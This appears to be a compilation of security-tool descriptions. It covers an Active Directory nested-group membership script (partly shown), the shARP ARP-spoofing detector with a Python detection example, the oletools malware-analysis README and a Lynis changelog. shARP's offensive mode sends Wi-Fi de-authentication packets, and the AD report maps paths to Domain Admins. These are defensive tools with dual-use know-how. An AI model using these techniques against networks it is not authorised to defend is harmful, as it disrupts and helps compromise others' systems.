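    """One row per user, with nested groups expanded."""
    return {attrs["sAMAccountName"]: effective_groups(directory, dn)
            for dn, attrs in directory.items() if "user" in attrs["objectClass"]}


if __name__ == "__main__":
    for user, groups in membership_report(DIRECTORY).items():
        print("%s\t%s" % (user, ", ".join(groups)))
```

    bob is only a direct member of Helpdesk, yet the expansion shows he is effectively in Domain Admins; that is the finding the tab-delimited "Domain Group Membership" output is meant to surface, and it is why one LDAP query for all groups plus an in-memory closure is so much faster than walking each group on the wire.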


    shARP - anti-ARP-spoofing application software and uses active scanning method to detect any ARP-spoofing incidents


    ARP spoofing allows an attacker to intercept data frames on a network, modify the traffic, or stop all traffic. The attack is often used as an opening for other attacks, such as denial of service, man-in-the-middle, or session hijacking. Our anti-ARP-spoofing program, shARP, actively detects the presence of a third party in a private network. It has two modes: defensive and offensive. Defensive mode protects the end user from the spoofer by disconnecting the user's system from the network and alerting the user with an audio message. Offensive mode disconnects the user's system from the network and additionally kicks the attacker out by sending de-authentication packets to his system, preventing him from reconnecting to the network until the program is manually reset. The program creates a log file (/usr/shARP/) containing the details of the attack, such as the attacker's MAC address, the MAC vendor, and the time and date of the attack. The obtained MAC address identifies the NIC of the attacker's system; if required, the attacker can be banned from the network permanently by adding his MAC address to the router's block list. The program is designed specifically for Linux and is written in shell (bash). In offensive mode it downloads, with the user's permission, the open-source aircrack-ng suite from the Internet if it is not already present on the system; Python must also be installed for it to work. Visit https://www.aircrack-ng.org for more info. Note that de-authentication frames are an 802.11 mechanism, so offensive mode only applies on Wi-Fi networks, and sending them is itself an active attack that belongs only on a network you are authorized to defend.

    A user who wants to secure his network by scanning for an attacker can simply run the program. It offers a simple command line interface that is easy for new users: the defensive or offensive mode is selected directly by passing the respective command line argument, just as with any other Linux command-line tool. If the user passes a wrong argument, the program prompts him to use the help option, which describes the two modes.

    In defensive mode, the user first receives the original MAC address of the gateway. If there is no man-in-the-middle attack, the screen stays idle. As soon as the program detects a spoofer on the network, it prints the MAC address of the spoofer and the time of the attack, then disconnects the user's system from the network to protect the private data being transferred between the system and the server. It also saves a log file about the attacker for further use.

    In offensive mode, the user likewise receives the original MAC address of the gateway, and when a spoofer is detected the program prints the spoofer's MAC address and the time of the attack, as in defensive mode. It then puts the user's network interface card into monitor mode with airmon-ng, after which the aircrack-ng suite is used to send de-authentication packets to the attacker's system, kicking the attacker off the network. The program also creates a log file about the attack.

    How to use
    bash ./shARP.sh -r [interface] to reset the network card and driver.  
    bash ./shARP.sh -d [interface] to activate the program in defense mode.
    bash ./shARP.sh -o [interface] to activate the program in offense mode.
    bash ./shARP.sh -h for help.
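    The detection step described above, as an added example that is not shARP's code and uses a passive check rather than its active scanning: record the gateway's hardware address at startup, then watch the kernel ARP cache (the /proc/net/arp format on Linux) for that address changing, and name the host whose own cache entry carries the impostor MAC. The two snapshots and all addresses below are constructed; on a real host you would read /proc/net/arp on a timer instead of the BASELINE/POISONED strings.

```python
# Added example (not shARP's code; passive ARP-cache inspection, not active
# scanning): flag a change of the gateway's MAC and identify the spoofing host.
# BASELINE/POISONED are constructed /proc/net/arp snapshots; all addresses invented.
import re

# IP, HW type, flags, MAC, mask, device (the /proc/net/arp column order).
ARP_LINE = re.compile(
    r"^(\S+)\s+0x[0-9a-f]+\s+0x[0-9a-f]+\s+([0-9a-f:]{17})\s+\S+\s+(\S+)$", re.I)

BASELINE = """\
IP address       HW type     Flags       HW address            Mask     Device
192.168.1.1      0x1         0x2         aa:bb:cc:00:00:01     *        wlan0
192.168.1.23     0x1         0x2         de:ad:be:ef:00:23     *        wlan0
"""

POISONED = """\
IP address       HW type     Flags       HW address            Mask     Device
192.168.1.1      0x1         0x2         de:ad:be:ef:00:23     *        wlan0
192.168.1.23     0x1         0x2         de:ad:be:ef:00:23     *        wlan0
"""


def parse_arp_table(text):
    """Return {ip: (mac, device)}; the header line and incomplete entries
    (all-zero MAC) are skipped."""
    table = {}
    for line in text.splitlines():
        m = ARP_LINE.match(line.strip())
        if m and m.group(2).lower() != "00:00:00:00:00:00":
            table[m.group(1)] = (m.group(2).lower(), m.group(3))
    return table


class GatewayWatch:
    """Pin the gateway's MAC from a trusted baseline snapshot."""

    def __init__(self, gateway_ip, baseline_table):
        self.gateway_ip = gateway_ip
        self.trusted_mac = baseline_table[gateway_ip][0]

    def check(self, table):
        """None while the gateway MAC is unchanged; otherwise an alert naming
        the impostor MAC and every other IP whose own entry uses that MAC
        (the spoofer's real address, if it is also in the cache)."""
        current = table.get(self.gateway_ip)
        if current is None or current[0] == self.trusted_mac:
            return None
        suspects = sorted(ip for ip, (mac, _dev) in table.items()
                          if mac == current[0] and ip != self.gateway_ip)
        return {"gateway": self.gateway_ip, "expected": self.trusted_mac,
                "seen": current[0], "suspect_ips": suspects}


if __name__ == "__main__":
    watch = GatewayWatch("192.168.1.1", parse_arp_table(BASELINE))
    print("baseline:", watch.check(parse_arp_table(BASELINE)))
    print("poisoned:", watch.check(parse_arp_table(POISONED)))
```

    The baseline has to be taken on a network you trust at that moment; if the cache is already poisoned when the watch starts, the impostor becomes the pinned address. That is the same limitation shARP's "original MAC address of the gateway" step carries, and it is why the tool also logs the vendor of the offending MAC for the user to sanity-check.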


    oletools - Tools to analyze MS OLE2 files and MS Office documents, for malware analysis, forensics and debugging


    oletools is a package of python tools to analyze Microsoft OLE2 files (also called Structured Storage, Compound File Binary Format or Compound Document File Format), such as Microsoft Office documents or Outlook messages, mainly for malware analysis, forensics and debugging. It is based on the olefile parser. See http://www.decalage.info/python/oletools for more info.

    News
    • 2016-11-01 v0.50: all oletools now support python 2 and 3.
      • olevba: several bugfixes and improvements.
      • mraptor: improved detection, added mraptor_milter for Sendmail/Postfix integration.
      • rtfobj: brand new RTF parser, obfuscation-aware, improved display, detect executable files in OLE Package objects.
      • setup: now creates handy command-line scripts to run oletools from any directory.
    • 2016-06-10 v0.47: olevba added PPT97 macros support, improved handling of malformed/incomplete documents, improved error handling and JSON output, now returns an exit code based on analysis results, new --relaxed option. rtfobj: improved parsing to handle obfuscated RTF documents, added -d option to set output dir. Moved repository and documentation to GitHub.
    • 2016-04-19 v0.46: olevba does not deobfuscate VBA expressions by default (much faster), new option --deobf to enable it. Fixed color display bug on Windows for several tools.
    • 2016-04-12 v0.45: improved rtfobj to handle several anti-analysis tricks, improved olevba to export results in JSON format.
    See the full changelog for more information.

    Tools:
    • olebrowse: A simple GUI to browse OLE files (e.g. MS Word, Excel, Powerpoint documents), to view and extract individual data streams.
    • oleid: to analyze OLE files to detect specific characteristics usually found in malicious files.
    • olemeta: to extract all standard properties (metadata) from OLE files.
    • oletimes: to extract creation and modification timestamps of all streams and storages.
    • oledir: to display all the directory entries of an OLE file, including free and orphaned entries.
    • olemap: to display a map of all the sectors in an OLE file.
    • olevba: to extract and analyze VBA Macro source code from MS Office documents (OLE and OpenXML).
    • MacroRaptor: to detect malicious VBA Macros
    • pyxswf: to detect, extract and analyze Flash objects (SWF) that may be embedded in files such as MS Office documents (e.g. Word, Excel) and RTF, which is especially useful for malware analysis.
    • oleobj: to extract embedded objects from OLE files.
    • rtfobj: to extract embedded objects from RTF files.
    • and a few others (coming soon)

    Projects using oletools:
    oletools are used by a number of projects and online malware analysis services, including Viper, REMnux, FAME, Hybrid-analysis.com, Joe Sandbox, Deepviz, Laika BOSS, Cuckoo Sandbox, Anlyz.io, ViperMonkey, pcodedmp, dridex.malwareconfig.com, and probably VirusTotal. (Please contact me if you have or know a project using oletools)

    Download and Install:
    The recommended way to download and install/update the latest stable release of oletools is to use pip:
    • On Linux/Mac: sudo -H pip install -U oletools
    • On Windows: pip install -U oletools
    This should automatically create command-line scripts to run each tool from any directory: olevba, mraptor, rtfobj, etc.
    To get the latest development version instead:
    • On Linux/Mac: sudo -H pip install -U https://github.com/decalage2/oletools/archive/master.zip
    • On Windows: pip install -U https://github.com/decalage2/oletools/archive/master.zip
    See the documentation for other installation options.

    Documentation:
    The latest version of the documentation can be found online, otherwise a copy is provided in the doc subfolder of the package.


    Lynis 2.4.7 - Security Auditing Tool for Unix/Linux Systems


    Changelog
    Lynis 2.4.7 (2017-03-22)

    Changes:
    * Minor code cleanups

    Tests:
    ------
    * BANN-7126 - Added more words to test for
    * CUPS-2308 - Improve logging for CUPS configuration test, removed exception handler
    * HTTP-6641 - Support detection for Apache module mod_reqtimeout
    * PKGS-7388 - Minor change to detect security repositories